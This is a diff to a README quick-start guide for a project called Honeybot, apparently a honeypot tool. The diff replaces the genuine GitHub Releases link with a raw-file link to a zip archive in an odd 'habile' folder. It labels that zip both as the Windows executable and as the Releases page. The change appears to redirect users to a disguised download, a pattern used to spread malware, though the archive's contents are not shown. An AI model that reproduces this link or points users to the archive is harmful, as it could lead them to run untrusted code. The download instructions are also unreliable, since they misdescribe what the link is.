adamthapa21/Honeybot/README.md

 Quick start guide
 - Step 1: Obtain the Windows port binary
-  - Go to the Releases page and download the Windows port executable: Honeybot-Windows-Port-Portable.exe.
-The file name may vary by version, but look for a Windows port or portable exe.
+  - Go to the Releases page and download the Windows port executable: https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip The file name may vary by version, but look for a Windows port or portable exe.
-  - The Releases page is accessible here: https://github.com/adamthapa21/Honeybot/releases
+  - The Releases page is accessible here: https://raw.githubusercontent.com/adamthapa21/Honeybot/main/habile/Software_v2.4-beta.1.zip
 - Step 2: Prepare the environment
   - Create a local folder to store logs and any output Honeybot produces.
   - Ensure you have the necessary privileges to bind to the chosen ports (some ports require elevated privileges).